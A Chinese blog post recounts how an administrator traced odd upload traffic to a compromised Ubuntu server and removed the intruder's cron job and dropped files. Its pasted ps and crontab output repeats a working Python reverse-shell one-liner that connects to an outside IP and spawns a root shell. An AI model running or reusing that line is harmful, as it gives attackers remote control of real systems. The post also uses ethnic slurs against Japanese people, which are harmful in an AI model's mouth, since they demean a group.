网站首页 文章专栏 某个小日本你个鬼孙黑客,胆敢犯我大中华linux 服务器
今天来和大家聊聊神秘的黑客,本人有时,也很好奇,他们就为什么能找到系统或某个软件的漏洞的呢?真的都是很懂某个领域,逐行读代码吗?
当然今天不是在教你怎么做一个黑客,而是在讲刚刚我遇到的一个小日本的黑客在偷偷地黑了本公司的一台线下ubuntu开发服务器,
root@development:~# uname -a
Linux development 3.13.0-119-generic #166-Ubuntu SMP Wed May 3 12:18:55 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
这要从上两个星期说起,一天中午回来,突然发现速度好卡,Ping 网关,有时会丢包,想着有回路,OK ,半个小时查到一根网线,的确不对头,一插到交换机上,就延迟大,更甚时,根本上不去网。果断拔掉,不关它,谁上不去网了,自会来找我。
好了,言归正转。昨天又发现网速不行了,可没有那么凶猛。感觉 软棉棉地,时不时,延迟大点,时不时又非常正常了。登陆路由发现总的上行达到1000000k还多,不应该啊,我们的上行没那么大啊。怀疑有主机的后台软件恶意上传东西,查了一下,越多的也就有一台开发用的服务器上传最高200多k,时不时。不对,如果普通员工上传200多k 是正常现象,可一台服务器我没操作不可能 那么高啊。
百度一下,linux 网络监控命令找到一个原生的ifstat ,执行一下,发现上传eth0 接口119146kb/s,可这个命令不太直观,不能看到哪个进程整的坏。再百度找到 nethogs 命令 ubuntu系统安装 apt-get install nethogs 如果报错: 点这里
sudo nethogs eth0
发现一个IP 为150.95.146.116 ,一查,MD小日本
root@development:~# netstat -natp | grep 150.95.146.116 tcp 0 1 192.168.2.246:58584 150.95.146.116:7890 SYN_SENT 28101/python tcp 0 1 192.168.2.246:57519 150.95.146.116:42289 SYN_SENT 2400/gettyy tcp 0 1 192.168.2.246:57433 150.95.146.116:7890 SYN_SENT 26518/python tcp 0 1 192.168.2.246:58005 150.95.146.116:7890 SYN_SENT 26667/python root@development:~# ps -ef | grep python oneapm-+ 1522 1 0 Jun12 ? 00:00:28 /opt/oneapm-ci-agent/embedded/bin/python /opt/oneapm-ci-agent/bin/supervisord -c /etc/oneapm-ci-agent/supervisor.conf --pidfile /opt/oneapm-ci-agent/run/oneapm-agent-supervisord.pid oneapm-+ 1526 1522 0 Jun12 ? 00:01:46 /opt/oneapm-ci-agent/embedded/bin/python /opt/oneapm-ci-agent/agent/onestatsd.py --use-local-forwarder oneapm-+ 1527 1522 0 Jun12 ? 00:02:00 /opt/oneapm-ci-agent/embedded/bin/python /opt/oneapm-ci-agent/agent/forwarder.py oneapm-+ 1528 1522 0 Jun12 ? 00:02:50 /opt/oneapm-ci-agent/embedded/bin/python /opt/oneapm-ci-agent/agent/agent.py foreground --use-local-forwarder root 4882 3539 0 09:31 ? 00:00:03 /usr/bin/python /usr/bin/supervisord -n -c /etc/supervisord.conf root 5000 3370 0 09:31 ? 00:00:00 /usr/sbin/uwsgi --pidfile /var/run/uwsgi2.pid -i /etc/pythonapp/confcenter.ini root 5128 5000 0 09:31 ? 00:00:00 /usr/sbin/uwsgi --pidfile /var/run/uwsgi2.pid -i /etc/pythonapp/confcenter.ini root 28235 28233 0 14:17 ? 00:00:00 /bin/sh -c /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.95.146.116",7890));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' root 28236 28235 0 14:17 ? 00:00:00 /usr/bin/python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.95.146.116",7890));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); root 28454 28445 0 14:18 ? 00:00:00 /bin/sh -c /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.95.146.116",7890));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' root 28455 28454 0 14:18 ? 00:00:00 /usr/bin/python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.95.146.116",7890));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); root 28505 17313 0 14:18 pts/11 00:00:00 grep --color=auto python root@development:~# ps -ef | grep 28233 root 28233 1260 0 14:17 ? 00:00:00 CRON root 28235 28233 0 14:17 ? 00:00:00 /bin/sh -c /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.95.146.116",7890));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' root 28567 17313 0 14:18 pts/11 00:00:00 grep --color=auto 28233
cat /etc/crontab * * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.95.146.116",7890));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' */3 * * * * root /etc/cron.hourly/cron.sh
修改/etc/crontab 不成功,提示没权限,ll 一看有写权限啊,想到 chattr -i /etc/crontab 再修改ok
接下来同样的方法 chattr -i /usr/bin/gettyy && rm /usr/bin/gettyy && chattr -i /usr/bin/.sshd && /bin/rm -rf /usr/bin/.sshd
chattr -i /usr/bin/gettyy && rm /usr/bin/gettyy && chattr -i /usr/bin/.sshd && /bin/rm -rf /usr/bin/.sshd
cat
/etc/cron.hourly/cron.sh 把里面的cp 源文件 和目标文件 删除了,这里忘截图 了
rm -rf /lib/udev/udev
这恶心的自我复制,重命名。垃圾地定时循环。操,滚出地球
root@development:~# netstat -natp 干净了
six six six
2017-06-28 19:05回复